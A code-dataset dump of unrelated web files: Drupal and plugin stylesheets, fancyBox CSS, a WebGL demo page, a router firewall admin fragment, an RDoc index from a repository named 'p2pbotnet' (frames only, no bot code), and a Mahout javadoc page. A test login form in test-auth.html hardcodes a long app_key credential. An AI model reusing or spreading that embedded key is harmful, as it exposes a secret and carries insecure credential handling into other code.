text-shadow: 0 1px 0 #fff;
top: -12px;
width: 100%;
-khtml-border-radius-topleft: 4px;
-moz-border-radius-topleft: 4px;
-webkit-border-top-left-radius: 4px;
border-top-left-radius: 4px;
-khtml-border-radius-topright: 4px;
-moz-border-radius-topright: 4px;
-webkit-border-top-right-radius: 4px;
border-top-right-radius: 4px;
}
fieldset.collapsed legend {
-khtml-border-radius: 4px;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
}
fieldset legend a {
color: #3b3b3b;
}
fieldset legend a:hover,
fieldset legend a:focus,
fieldset legend a:active {
color: #000;
}
fieldset .fieldset-wrapper {
padding: 0 10px;
}
fieldset .fieldset-description {
margin-top: 5px;
margin-bottom: 1em;
line-height: 1.4;
color: #3c3c3c;
font-style: italic;
}
input {
margin: 2px 0;
padding: 4px;
}
input,
textarea {
font-size: 0.929em;
}
textarea {
line-height: 1.5;
}
textarea.form-textarea,
select.form-select {
padding: 4px;
}
input.form-text,
textarea.form-textarea,
select.form-select {
border: 1px solid #ccc;
}
input.form-submit:hover,
input.form-submit:focus {
background: #dedede;
}
.password-suggestions ul li {
margin-left: 1.2em; /* LTR */
}
.form-item {
margin-bottom: 1em;
margin-top: 2px;
}
.form-item label {
font-size: 0.929em;
}
.form-type-radio label,
.form-type-checkbox label {
margin-left: 4px;
}
.form-type-radio .description,
.form-type-checkbox .description {
margin-left: 2px;
}
.form-actions {
padding-top: 10px;
}
/* Contact Form */
.contact-form #edit-name {
width: 75%;
-khtml-border-radius: 4px;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
}
.contact-form #edit-mail {
width: 75%;
-khtml-border-radius: 4px;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
}
.contact-form #edit-subject {
width: 75%;
-khtml-border-radius: 4px;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
}
.contact-form #edit-message {
width: 76.3%;
-khtml-border-top-left-radius: 4px;
-khtml-border-top-right-radius: 4px;
-moz-border-radius-topleft: 4px;
-moz-border-radius-topright: 4px;
-webkit-border-top-left-radius: 4px;
-webkit-border-top-right-radius: 4px;
border-top-left-radius: 4px;
border-top-right-radius: 4px;
}
.contact-form .resizable-textarea .grippie {
width: 76%;
-khtml-border-bottom-left-radius: 4px;
-khtml-border-bottom-right-radius: 4px;
-moz-border-radius-bottomleft: 4px;
-moz-border-radius-bottomright: 4px;
-webkit-border-bottom-left-radius: 4px;
-webkit-border-bottom-right-radius: 4px;
border-bottom-left-radius: 4px;
border-bottom-right-radius: 4px;
}
/* Disabled form elements */
input.form-button-disabled,
input.form-button-disabled:hover,
input.form-button-disabled:focus,
input.form-button-disabled:active,
.form-disabled input,
.form-disabled select,
.form-disabled textarea {
background: #ededed;
border-color: #bbb;
color: #717171;
}
.form-disabled .grippie {
background-color: #ededed;
border-color: #bbb;
}
.form-disabled label {
color: #717171;
}
/* Animated throbber */
html.js input.form-autocomplete {
background-position: 100% 4px; /* LTR */
}
html.js input.throbbing {
background-position: 100% -16px; /* LTR */
}
/* Comment form */
.comment-form label {
float: left; /* LTR */
font-size: 0.929em;
width: 120px;
}
.comment-form input,
.comment-form .form-select {
margin: 0;
-khtml-border-radius: 4px;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
}
.comment-form .form-type-textarea label {
float: none;
}
.comment-form .form-item,
.comment-form .form-radios,
.comment-form .form-type-checkbox,
.comment-form .form-select {
margin-bottom: 10px;
overflow: hidden;
}
.comment-form .form-type-checkbox,
.comment-form .form-radios {
margin-left: 120px; /* LTR */
}
.comment-form .form-type-checkbox label,
.comment-form .form-radios label {
float: none;
margin-top: 0;
}
.comment-form input.form-file {
width: auto;
}
.no-sidebars .comment-form .form-text {
width: 800px;
}
.one-sidebar .comment-form .form-text {
width: 500px;
}
.two-sidebars .comment-form .form-text {
width: 320px;
}
.comment-form .form-item .description {
font-size: 0.786em;
line-height: 1.2;
margin-left: 120px; /* LTR */
}
#content h2.comment-form {
margin-bottom: 0.5em;
}
.comment-form .form-textarea {
-khtml-border-radius-topleft: 4px;
-khtml-border-radius-topright: 4px;
-moz-border-radius-topleft: 4px;
-moz-border-radius-topright: 4px;
-webkit-border-top-left-radius: 4px;
-webkit-border-top-right-radius: 4px;
border-top-left-radius: 4px;
border-top-right-radius: 4px;
}
.comment-form fieldset.filter-wrapper .fieldset-wrapper,
.comment-form .text-format-wrapper .form-item {
margin-top: 0;
margin-bottom: 0;
}
.filter-wrapper label {
width: auto;
float: none;
}
.filter-wrapper .form-select {
min-width: 120px;
}
.comment-form fieldset.filter-wrapper .tips {
font-size: 0.786em;
}
#comment-body-add-more-wrapper .form-type-textarea label {
margin-bottom: 0.4em;
}
#edit-actions input {
margin-right: 0.6em; /* LTR */
}
/* -------------- Other Overrides ------------- */
div.password-suggestions {
border: 0;
}
.ui-widget-overlay {
background: #222222;
opacity: 0.7;
}
div.vertical-tabs .vertical-tabs-panes fieldset.vertical-tabs-pane {
padding: 1em;
}
#forum .name {
font-size: 1.083em;
}
#forum .description {
font-size: 1em;
}
/* --------------- Search Form ---------------- */
#block-search-form {
padding-bottom: 7px;
}
#block-search-form .content {
margin-top: 0;
}
#search-form input#edit-keys,
#block-search-form .form-item-search-block-form input {
float: left; /* LTR */
font-size: 1em;
height: 1.143em;
margin-right: 5px;
width: 9em;
}
#search-block-form input.form-submit,
#search-form input.form-submit {
margin-left: 0;
margin-right: 0;
height: 25px;
width: 34px;
padding: 0;
cursor: pointer;
text-indent: -9999px;
border-color: #e4e4e4 #d2d2d2 #b4b4b4;
background: url(../images/search-button.png) no-repeat center top;
overflow: hidden;
}
#search-block-form input.form-submit:hover,
#search-block-form input.form-submit:focus,
#search-form input.form-submit:hover,
#search-form input.form-submit:focus {
background-position: center bottom;
}
#search-form .form-item-keys label {
display: block;
}
/* --------------- Search Results ---------------- */
ol.search-results {
padding-left: 0;
}
.search-results li {
border-bottom: 1px solid #d3d7d9;
padding-bottom: 0.4285em;
margin-bottom: 0.5em;
}
.search-results li:last-child {
border-bottom: none;
padding-bottom: 0;
margin-bottom: 1em;
}
.search-results .search-snippet-info {
padding-left: 0;
}
/* -------------- Shortcut Links -------------- */
.shortcut-wrapper {
margin: 2.2em 0 1.1em 0; /* Same as usual h1#page-title margin. */
}
.shortcut-wrapper h1#page-title {
float: left; /* LTR */
margin: 0;
}
div.add-or-remove-shortcuts {
padding-top: 0.9em;
}
.overlay div.add-or-remove-shortcuts {
padding-top: 0.8em;
}
/* ---------- Admin-specific Theming ---------- */
.page-admin #content img {
margin-right: 15px; /* LTR */
}
.page-admin #content .simpletest-image img {
margin: 0;
}
.page-admin-structure-block-demo .block-region {
background: #ffff66;
border: 1px dotted #9f9e00;
color: #000;
font: 90% "Lucida Grande", "Lucida Sans Unicode", sans-serif;
margin: 5px;
padding: 5px;
text-align: center;
text-shadow: none;
}
.page-admin-structure-block-demo #featured .block-region {
font-size: 0.55em;
}
.page-admin-structure-block-demo #header .block-region {
width: 500px;
}
.page-admin #admin-dblog img {
margin: 0 5px;
}
/* Fix spacing when Seven is used in the overlay. */
#system-theme-settings fieldset {
padding: 0;
}
#system-theme-settings fieldset .fieldset-legend {
margin-top: 0;
}
/* Configuration. */
div.admin .right,
div.admin .left {
width: 49%;
margin: 0;
}
div.admin-panel {
background: #fbfbfb;
border: 1px solid #ccc;
margin: 10px 0;
padding: 0 5px 5px;
}
div.admin-panel h3 {
margin: 16px 7px;
}
div.admin-panel dt {
border-top: 1px solid #ccc;
padding: 7px 0 0;
}
div.admin-panel dd {
margin: 0 0 10px;
}
div.admin-panel .description {
margin: 0 0 14px 7px;
}
/* ---------- Overlay layout styles ----------- */
.overlay #main,
.overlay #content {
width: auto;
float: none;
}
.overlay #page {
padding: 0 2em;
}
.overlay .region-page-top,
.overlay #header,
.overlay #page-title,
.overlay #featured,
.overlay #sidebar-first,
.overlay #triptych-wrapper,
.overlay #footer-wrapper {
display: none;
}
.overlay-processed .field-type-image {
display: block;
float: none;
}
.overlay #messages {
width: auto;
}
/* ---------- Poll ----------- */
.node .poll {
margin: 2em 0;
}
.node .poll #edit-choice {
margin: 0 0 1.5em;
}
.poll .vote-form {
text-align: left; /* LTR */
}
.poll .vote-form .choices {
margin: 0;
}
.poll .percent {
font-size: 0.857em;
font-style: italic;
margin-bottom: 3em;
margin-top: -3.2em;
float: right;
text-align: right;
}
.poll .text {
clear: right;
margin-right: 2.25em;
}
.poll .total {
font-size: 0.929em;
font-style: italic;
text-align: right; /* LTR */
clear: both;
}
.node .poll {
margin: 1.8em 0 0;
}
.node .poll .text {
margin-right: 6.75em;
}
.node .poll #edit-choice {
margin: 0 0 1.2em;
}
.poll .bar .foreground {
background-color: #666;
}
#footer-wrapper .poll .bar {
background-color: #666;
}
#footer-wrapper .poll .bar .foreground {
background-color: #ddd;
}
|
doc/index.html | nikkolasg/p2pbotnet | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<!--
RDoc Documentation
-->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>RDoc Documentation</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<frameset rows="20%, 80%">
<frameset cols="25%,35%,45%">
<frame src="fr_file_index.html" title="Files" name="Files" />
<frame src="fr_class_index.html" name="Classes" />
<frame src="fr_method_index.html" name="Methods" />
</frameset>
<frame src="files/type_rb.html" name="docwin" />
</frameset>
</html> |
linux/embedded_rootfs/pkg_addon/EasyAccess/src/WWW/cgi-bin/admin-pages/eps/firewall/html/epsfirewall3.html | odit/rv042 | </table></td><td width=1 height="" class="darkback"><img src="/images/shim.gif" width=1 height=1 border=0></td></tr></table>
<img src="/images/shim.gif" height=22><br>
<table border=0 cellpadding=0 cellspacing=0 valign="top">
<tbody><tr><td width=430></td>
<td width=80 height=21 valign="center" align="right">
<table cellpadding=0 cellspacing=0 border=0 class=mybutton><TR>
<td width=80 class=bbcenter align=center onClick="javascript:
window.open('/cgi-bin/addepsfirewall','AddEpsFirewall','width=400,height=269,resizable,');" onMouseOver="JavaScript:this.className='bbcenteron';window.status='';" onMouseOut="JavaScript:this.className='bbcenter';"><SCRIPT type="text/JavaScript" language="JavaScript">bbutton('Add Firewall'); </script>
</td>
</tr></table>
</td></tr></tbody></table>
</form></table>
</body></html>
|
Exemplos/4 - Transformations/shadow.html | Eliada/ep2-cg | <!DOCTYPE html>
<html>
<script id="vertex-shader" type="x-shader/x-vertex">
attribute vec4 vPosition;
uniform mat4 modelViewMatrix;
uniform mat4 projectionMatrix;
void main()
{
gl_Position = projectionMatrix*modelViewMatrix*vPosition;
}
</script>
<script id="fragment-shader" type="x-shader/x-fragment">
precision mediump float;
uniform vec4 fColor;
void
main()
{
gl_FragColor = fColor;
}
</script>
<script type="text/javascript" src="Common/webgl-utils.js"></script>
<script type="text/javascript" src="Common/initShaders.js"></script>
<script type="text/javascript" src="shadow.js"></script>
<script type="text/javascript" src="Common/MV.js"></script>
<body>
<canvas id="gl-canvas" width="512" height="512">
Oops ... your browser doesn't support the HTML5 canvas element
</canvas>
</body>
</html>
|
demo/style/css/widget/calendar/calendar.default.css | elppac/moment | .ui-calendar {
width: 100%;
line-height: 25px;
font-size: 14px;
}
.ui-calendar-header {
color: #545454;
text-align: center;
padding: 3px 0;
}
.ui-calendar-header a {
color: #545454;
text-decoration: none;
display: inline-block;
padding: 5px;
margin: 0 5px;
text-align: center;
border-radius: 3px;
line-height: 1.0;
}
.ui-calendar-header a.ui-state-hover {
background-color: #ccc;
}
.ui-calendar-header .ui-calendar-title {
text-align: center;
display: inline-block;
}
.ui-calendar-calendar {
width: 100%;
border-collapse: collapse;
}
.ui-calendar-calendar th, .ui-calendar-calendar td {
text-align: center;
color: #000;
background: #f5f5f5;
border: 1px solid #fff;
font-weight: normal;
}
.ui-calendar-calendar thead tr {
border: 1px solid #fff;
}
.ui-calendar-calendar thead th {
color: #fff;
background: #b6b6b6;
}
.ui-calendar-calendar a {
text-decoration: none;
color:#000;
display: block;
}
.ui-calendar-calendar tr.ui-calendar-gap td {
line-height: 5px;
font-size: 0;
border: none;
background: transparent;
}
.ui-calendar-calendar td.ui-calendar-unSelectable {
color: #e1e1e1;
}
.ui-calendar-calendar td.ui-calendar-today {
background: #FBF9EE;
}
.ui-calendar-calendar td.ui-calendar-current-day {
background: #b6b6b6;
font-weight: bold;
border-color: #fff;
}
.ui-calendar-calendar td.ui-state-hover {
background: #ccc;
}
.ui-slideup .header {
line-height: 43px;
height: 43px;
border-top: 1px solid black;
border-bottom: 1px solid black;
opacity: 0.9;
background: url(calendar-header.png) repeat-x;
overflow: hidden;
}
.ui-slideup .ok-btn, .ui-slideup .no-btn {
position: absolute;
top: 7px;
height: 20px;
line-height: 20px;
padding: 0 5px;
margin: 0;
border-width: 5px;
font-size: 12px;
font-weight: bold;
text-shadow: rgba(0, 0, 0, 0.8) 0 -1px 0;
color: white;
text-decoration: none;
display: block;
}
.ui-slideup .ok-btn {
right: 7px;
float: right;
-webkit-border-image: url(done.png) 5;
}
.ui-slideup .no-btn {
left: 7px;
float: left;
-webkit-border-image: url(cancel.png) 5;
}
.ui-slideup .ok-btn.ui-state-hover, .ui-slideup .no-btn.ui-state-hover{
opacity: 0.4;
}
.ui-slideup .frame {
background: #e1e1e1;
padding: 5px;
}
|
wp-content/plugins-hold/buddypress-groups-extras/_inc/admin-styles.css | Owchzzz/Militiatoday | body.edit-php #wpbody-content h2 a.add-new-h2{display:none}
table#bp-gtm-admin-table td.checkbox{
width:15px;
border-right: 1px solid #dfdfdf;
}
#bpge-form .buy_bpge{
font-size: 24px;
height: auto;
line-height: 36px;
padding: 10px 30px;
}
#bpge-form ul.sets{
overflow:hidden;
margin:20px 0 10px 10px;
}
#bpge-form ul.sets li{
overflow:hidden;
margin-bottom:10px;
padding: 5px 0;
}
#bpge-form ul.sets li a.show_fields,
#bpge-form ul.sets li a.add_fields{
margin-left: 10px
}
#bpge-form ul.sets li span.active{
float:left;
width:20px;
}
#bpge-form ul.sets li span.name{
float:left;
width:15%;
}
#bpge-form ul.sets li span.desc{
float:left;
width:31%;
}
#bpge-form ul.sets li ul.fields{
display:none;
float:left;
width:89%;
clear: both;
margin: 5px 0 5px 20px;
list-style-type:circle;
}
#bpge-form ul.sets li ul.fields li{
margin:0;
list-style:circle inside;
}
#bpge-form ul.sets li ul.fields .add_field{
float:left;
}
#bpge-form ul.sets li ul.fields.show{
display:block;
}
#bpge-form ul.sets li span.no_fields{
float:left;
}
#bpge-form ul.sets li span.actions,
#bpge-form ul.sets li a.create_fields_set{
float:right
}
#bpge-admin .inside{
overflow:hidden;
}
#bpge-admin .nav-tab-wrapper{
margin-top:5px;
}
#bpge-admin .add_set_fields{
margin-top:14px;
}
#box_add_set_fields,
#box_edit_set_fields,
#box_add_field{
display:none;
padding:10px 12px 0px;
}
#bpge-admin #box_add_set_fields h4,
#bpge-admin #box_edit_set_fields h4,
#bpge-admin #box_add_field h4{
font-family: Georgia,"Times New Roman","Bitstream Charter",Times,serif;
color: #464646;
font-weight:bold;
line-height:30px;
border-bottom:1px solid #aaa;
}
#bpge-admin #box_add_set_fields div,
#bpge-admin #box_edit_set_fields div,
#bpge-admin #box_add_field div{
overflow:hidden;
margin-bottom:10px;
}
#bpge-admin #box_add_set_fields label,
#bpge-admin #box_edit_set_fields label,
#bpge-admin #box_add_field label{
float:left;
width:205px;
line-height:28px;
}
#bpge-admin #box_add_set_fields input,
#bpge-admin #box_edit_set_fields input,
#bpge-admin #box_add_field input{
width:149px;
padding: 4px;
border:1px solid #DFDFDF;
border-radius:4px;
}
#bpge-admin #box_add_set_fields textarea,
#bpge-admin #box_edit_set_fields textarea,
#bpge-admin #box_add_field textarea{
width:400px !important;
height:100px;
padding: 4px;
border:1px solid #DFDFDF;
border-radius:4px;
}
#extra-field-vars .content label{
display:block;
width:100% !important;
font-weight:bold;
}
#extra-field-vars .links{
line-height:26px;
}
#bpge-admin #box_add_set_fields #savenewsf,
#bpge-admin #box_edit_set_fields #editsf,
#bpge-admin #box_add_field #addnewfield{
width:150px;
border-radius:11px;
padding:4px 0;
margin-left:455px;
height: auto;
} |
mypage/test-auth.html | KangbingZhao/baigoSSO | <!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<title></title>
</head>
<body>
<form name="test" action="user_identification.php" method="post">
<input type="text" name="app_id" id="app_id" value="1">
<input type="text" name="app_key" id="app_key" value="Ei1F4LeTIUmJeFdO1MfbdkGQpZMeQ0CUX3aQD4kMOMVsRz7IAbjeBpurD6LTvNoI">
<input type="text" name="token" id="token">
<input type="submit" name="submit" id="submit" value="submit">
</form>
<br>
<a href="login.php?referer=test.html">登录测试</a>
</body>
</html> |
wp-content/themes/wp-foundation/fbox/jquery.fancybox.css | Disorder316/My-Landing-Page | /*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */
.fancybox-wrap,
.fancybox-skin,
.fancybox-outer,
.fancybox-inner,
.fancybox-image,
.fancybox-wrap iframe,
.fancybox-wrap object,
.fancybox-nav,
.fancybox-nav span,
.fancybox-tmp
{
padding: 0;
margin: 0;
border: 0;
outline: none;
vertical-align: top;
}
.fancybox-wrap {
position: absolute;
top: 0;
left: 0;
z-index: 8020;
}
.fancybox-skin {
position: relative;
background: #f9f9f9;
color: #444;
text-shadow: none;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
}
.fancybox-opened {
z-index: 8030;
}
.fancybox-opened .fancybox-skin {
-webkit-box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);
-moz-box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);
box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);
}
.fancybox-outer, .fancybox-inner {
position: relative;
}
.fancybox-inner {
overflow: hidden;
}
.fancybox-type-iframe .fancybox-inner {
-webkit-overflow-scrolling: touch;
}
.fancybox-error {
color: #444;
font: 14px/20px "Helvetica Neue",Helvetica,Arial,sans-serif;
margin: 0;
padding: 15px;
white-space: nowrap;
}
.fancybox-image, .fancybox-iframe {
display: block;
width: 100%;
height: 100%;
}
.fancybox-image {
max-width: 100%;
max-height: 100%;
}
#fancybox-loading, .fancybox-close, .fancybox-prev span, .fancybox-next span {
background-image: url('fancybox_sprite.png');
}
#fancybox-loading {
position: fixed;
top: 50%;
left: 50%;
margin-top: -22px;
margin-left: -22px;
background-position: 0 -108px;
opacity: 0.8;
cursor: pointer;
z-index: 8060;
}
#fancybox-loading div {
width: 44px;
height: 44px;
background: url('fancybox_loading.gif') center center no-repeat;
}
.fancybox-close {
position: absolute;
top: -18px;
right: -18px;
width: 36px;
height: 36px;
cursor: pointer;
z-index: 8040;
}
.fancybox-nav {
position: absolute;
top: 0;
width: 40%;
height: 100%;
cursor: pointer;
text-decoration: none;
background: transparent url('blank.gif'); /* helps IE */
-webkit-tap-highlight-color: rgba(0,0,0,0);
z-index: 8040;
}
.fancybox-prev {
left: 0;
}
.fancybox-next {
right: 0;
}
.fancybox-nav span {
position: absolute;
top: 50%;
width: 36px;
height: 34px;
margin-top: -18px;
cursor: pointer;
z-index: 8040;
visibility: hidden;
}
.fancybox-prev span {
left: -30px;
background-position: 0 -36px;
}
.fancybox-next span {
right: -30px;
background-position: 0 -72px;
}
.fancybox-nav:hover span {
visibility: visible;
}
.fancybox-tmp {
position: absolute;
top: -99999px;
left: -99999px;
visibility: hidden;
max-width: 99999px;
max-height: 99999px;
overflow: visible !important;
}
/* Overlay helper */
.fancybox-lock {
overflow: hidden !important;
width: auto;
}
.fancybox-lock body {
overflow: hidden !important;
}
.fancybox-lock-test {
overflow-y: hidden !important;
}
.fancybox-overlay {
position: absolute;
top: 0;
left: 0;
overflow: hidden;
display: none;
z-index: 8010;
background: url('fancybox_overlay.png');
}
.fancybox-overlay-fixed {
position: fixed;
bottom: 0;
right: 0;
}
.fancybox-lock .fancybox-overlay {
overflow: auto;
overflow-y: scroll;
}
/* Title helper */
.fancybox-title {
visibility: hidden;
font: normal 13px/20px "Helvetica Neue",Helvetica,Arial,sans-serif;
position: relative;
text-shadow: none;
z-index: 8050;
}
.fancybox-opened .fancybox-title {
visibility: visible;
}
.fancybox-title-float-wrap {
position: absolute;
bottom: 0;
right: 50%;
margin-bottom: -35px;
z-index: 8050;
text-align: center;
}
.fancybox-title-float-wrap .child {
display: inline-block;
margin-right: -100%;
padding: 2px 20px;
background: transparent; /* Fallback for web browsers that doesn't support RGBa */
background: rgba(0, 0, 0, 0.8);
-webkit-border-radius: 15px;
-moz-border-radius: 15px;
border-radius: 15px;
text-shadow: 0 1px 2px #222;
color: #FFF;
font-weight: bold;
line-height: 24px;
white-space: nowrap;
}
.fancybox-title-outside-wrap {
position: relative;
margin-top: 10px;
color: #fff;
}
.fancybox-title-inside-wrap {
padding-top: 10px;
}
.fancybox-title-over-wrap {
position: absolute;
bottom: 0;
left: 0;
color: #fff;
padding: 10px;
background: #000;
background: rgba(0, 0, 0, .8);
}
/*Retina graphics!*/
@media only screen and (-webkit-min-device-pixel-ratio: 1.5),
only screen and (min--moz-device-pixel-ratio: 1.5),
only screen and (min-device-pixel-ratio: 1.5){
#fancybox-loading, .fancybox-close, .fancybox-prev span, .fancybox-next span {
background-image: url('fancybox_sprite@2x.png');
background-size: 44px 152px; /*The size of the normal image, half the size of the hi-res image*/
}
#fancybox-loading div {
background-image: url('fancybox_loading@2x.gif');
background-size: 24px 24px; /*The size of the normal image, half the size of the hi-res image*/
}
}
|
sites/all/libraries/mahout/docs/mahout-math/org/apache/mahout/math/Matrix.html | front/commerce | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_24) on Sat May 28 14:06:36 BST 2011 -->
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>
Matrix (Mahout Math 0.5 API)
</TITLE>
<META NAME="date" CONTENT="2011-05-28">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Matrix (Mahout Math 0.5 API)";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/Matrix.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../org/apache/mahout/math/IndexException.html" title="class in org.apache.mahout.math"><B>PREV CLASS</B></A>
<A HREF="../../../../org/apache/mahout/math/MatrixSlice.html" title="class in org.apache.mahout.math"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html?org/apache/mahout/math/Matrix.html" target="_top"><B>FRAMES</B></A>
<A HREF="Matrix.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | FIELD | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
org.apache.mahout.math</FONT>
<BR>
Interface Matrix</H2>
<DL>
<DT><B>All Superinterfaces:</B> <DD><A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Cloneable.html?is-external=true" title="class or interface in java.lang">Cloneable</A>, <A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Iterable.html?is-external=true" title="class or interface in java.lang">Iterable</A><<A HREF="../../../../org/apache/mahout/math/MatrixSlice.html" title="class in org.apache.mahout.math">MatrixSlice</A>>, <A HREF="../../../../org/apache/mahout/math/VectorIterable.html" title="interface in org.apache.mahout.math">VectorIterable</A></DD>
</DL>
<DL>
<DT><B>All Known Implementing Classes:</B> <DD><A HREF="../../../../org/apache/mahout/math/AbstractMatrix.html" title="class in org.apache.mahout.math">AbstractMatrix</A>, <A HREF="../../../../org/apache/mahout/math/DenseMatrix.html" title="class in org.apache.mahout.math">DenseMatrix</A>, <A HREF="../../../../org/apache/mahout/math/MatrixView.html" title="class in org.apache.mahout.math">MatrixView</A>, <A HREF="../../../../org/apache/mahout/math/SparseColumnMatrix.html" title="class in org.apache.mahout.math">SparseColumnMatrix</A>, <A HREF="../../../../org/apache/mahout/math/SparseMatrix.html" title="class in org.apache.mahout.math">SparseMatrix</A>, <A HREF="../../../../org/apache/mahout/math/SparseRowMatrix.html" title="class in org.apache.mahout.math">SparseRowMatrix</A>, <A HREF="../../../../org/apache/mahout/math/VectorList.html" title="class in org.apache.mahout.math">VectorList</A></DD>
</DL>
<HR>
<DL>
<DT><PRE>public interface <B>Matrix</B><DT>extends <A HREF="http://download.oracle.com/javase/6/docs/api/java/lang/Cloneable.html?is-external=true" title="class or interface in java.lang">Cloneable</A>, <A HREF="../../../../org/apache/mahout/math/VectorIterable.html" title="interface in org.apache.mahout.math">VectorIterable</A></DL>
</PRE>
<P>
The basic interface including numerous convenience functions
<P>
<P>
<HR>
<P>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Method Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> double</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#aggregate(org.apache.mahout.math.function.DoubleDoubleFunction, org.apache.mahout.math.function.DoubleFunction)">aggregate</A></B>(<A HREF="../../../../org/apache/mahout/math/function/DoubleDoubleFunction.html" title="interface in org.apache.mahout.math.function">DoubleDoubleFunction</A> combiner,
<A HREF="../../../../org/apache/mahout/math/function/DoubleFunction.html" title="interface in org.apache.mahout.math.function">DoubleFunction</A> mapper)</CODE>
<BR>
Collects the results of a function applied to each element of a matrix and then
aggregated.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> <A HREF="../../../../org/apache/mahout/math/Vector.html" title="interface in org.apache.mahout.math">Vector</A></CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../../org/apache/mahout/math/Matrix.html#aggregateColumns(org.apache.mahout.math.function.VectorFunction)">aggregateColumns</A></B>(<A HREF="../../../../org/apache/mahout/math/function/VectorFunction.html" title="interface in org.apache.mahout.math.function">VectorFunction</A> f)</CODE>
<BR>
Collects the results of a function applied to each column of a matrix.</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
